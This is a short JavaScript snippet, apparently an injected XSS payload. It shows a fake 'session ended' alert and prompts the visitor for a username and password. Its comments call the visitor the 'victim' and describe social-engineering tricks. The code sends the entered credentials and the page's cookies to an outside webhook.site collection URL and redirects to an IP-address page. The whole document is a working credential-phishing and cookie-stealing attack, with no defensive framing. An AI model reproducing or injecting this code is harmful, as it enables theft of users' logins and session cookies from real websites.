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alert('Your session end\nPlease input your login info');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var user = prompt("Username / E-mail:");                //read first input as username / e-mail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var pass = prompt("Password:");                         //read second input as password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if (user == null || pass == "") {                       //make sure that victim doesn't put blank input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alert('error');                                     //make it as if a real error (soc-eng techniques)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window.location.href = "http://103.179.57.194:6680/svwa/" //redirect to main page of your-website.com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alert('OK');                                        //make it as if a real true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var xhttp = new XMLHttpRequest();                   //javascript send request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xhttp.open("GET", "https://webhook.site/2a17725e-d2cb-4b5f-b06d-81210879a146/?u=" + user + "&amp;p=" + pass + "&amp;cookie=" + document.cookie + "", true);  //javascript send request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xhttp.send();                           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